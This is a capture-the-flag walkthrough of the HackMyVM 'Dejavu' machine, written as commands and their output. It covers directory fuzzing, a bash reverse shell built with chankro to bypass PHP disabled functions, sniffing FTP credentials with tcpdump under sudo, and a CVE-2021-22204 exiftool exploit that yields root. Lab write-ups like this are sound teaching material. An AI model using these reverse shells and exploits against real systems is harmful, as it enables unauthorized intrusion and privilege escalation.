NOTES ABOUT Dejavu
[ 2022-10-22 ] [ HackMyVM / Dejavu ]Status: Rooted
Skills: Port Scanning, Fuzzing, Upload Bypass, PHP Disabled Functions Bypass, Reverse Shell, Exiftool Exploit,
Tools: nmap, ssh, gobuster, chankro, nc, exiftool, tcpdump
PORT SCANNING
$ nmap -T4 -sCSV -p- 10.0.2.14
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:8f:5b:43:62:a1:5b:41:6d:7b:6e:55:27:bd:e1:67 (RSA)
| 256 10:17:d6:76:95:d0:9c:cc:ad:6f:20:7d:33:4a:27:4c (ECDSA)
|_ 256 12:72:23:de:ef:28:28:9e:e0:12:ae:5f:37:2e:ee:25 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
GETTING IN
$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u 10.0.2.14
/index.html (Status: 200) [Size: 10918]
/info.php (Status: 200) [Size: 69920]
/server-status (Status: 403) [Size: 274]
$ curl 10.0.2.14/info.php
<html>
<body>
<!-- /S3cR3t -->
</body>
</html>
[...]
http://10.0.2.14/info.php - HUM?
+--------------------+--------------------------------------------------------+
| disable_functions | system,exec,passthru,shell_exec,proc_open, |
| | proc_get_status,proc_terminate,proc_close,virtual, |
| | popen,show_source,curl_multi_exec,pcntl_alarm, |
| | pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited |
| | pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued, |
| | pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig, |
| | pcntl_signal,pcntl_signal_get_handler, |
| | pcntl_signal_dispatch,pcntl_get_last_error, |
| | pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo, |
| | pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority, |
| | pcntl_setpriority,pcntl_async_signals,pcntl_unshare |
+--------------------+--------------------------------------------------------+
[ how-i-bypassed-disable-functions-in-php-to-get-a-remote-shell ]
[ https://github.com/kriss-u/chankro-py3 ]
$ git clone https://github.com/kriss-u/chankro-py3.git
$ cd chankro-py3
$ cat rev.sh
bash -c 'bash -i >& /dev/tcp/10.0.2.15/80 0>&1'
$ python3 chankro.py --arch 64 --input rev.sh --output shell.phtml --path /var/www/html
$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.14] 60406
bash: cannot set terminal process group (758): Inappropriate ioctl for device
bash: no job control in this shell
<nMostCriticalInternetSecurityThreats/S3cR3t/files$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ELEVATING PRIVILEGES
<nMostCriticalInternetSecurityThreats/S3cR3t/files$ sudo -l
sudo -l
Matching Defaults entries for www-data on dejavu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on dejavu:
(robert) NOPASSWD: /usr/sbin/tcpdump
LOCAL PORT SCAN WITH NC
nc -zv 127.0.0.1 1-65365 2>&1 | grep suc
Connection to 127.0.0.1 21 port [tcp/ftp] succeeded!
Connection to 127.0.0.1 22 port [tcp/ssh] succeeded!
Connection to 127.0.0.1 80 port [tcp/http] succeeded!
LISTENING FTP COMUNICATION WITH TCPDUMP
www-data@dejavu:/$ tcpdump -i lo port ftp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
[...]
FTP: 220 (vsFTPd 3.0.3)
FTP: USER robert
FTP: 331 Please specify the password.
FTP: PASS ********************
FTP: 230 Login successful.
FTP: QUIT
FTP: 221 Goodbye.
[..]
$ ssh robert@10.0.2.14
robert@10.0.2.14\'s password:
[...]
robert@dejavu:~$ cat user.txt
HMV{********************}
EXIFTOOL EXPLOIT
$ wget https://raw.githubusercontent.com/convisolabs/CVE-2021-22204-exiftool/master/exploit.py -O CVE-2021-22204-exiftool.py
$ python3 ./CVE-2021-22204-exiftool.py
$ cat ./CVE-2021-22204-exiftool.py
#!/bin/env python3
import base64
import subprocess
ip = '10.0.2.15'
port = '80'
[...]
$ scp exploit.djvu robert@10.0.2.14:/home/robert
$ nc -lvnp 80
#RUN EXPLOIT
robert@dejavu:~$ sudo -u root exiftool ./exploit.djvu
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.14] 60142
# id
uid=0(root) gid=0(root) groups=0(root)
# cat root.txt
HMV{********************}
# init 0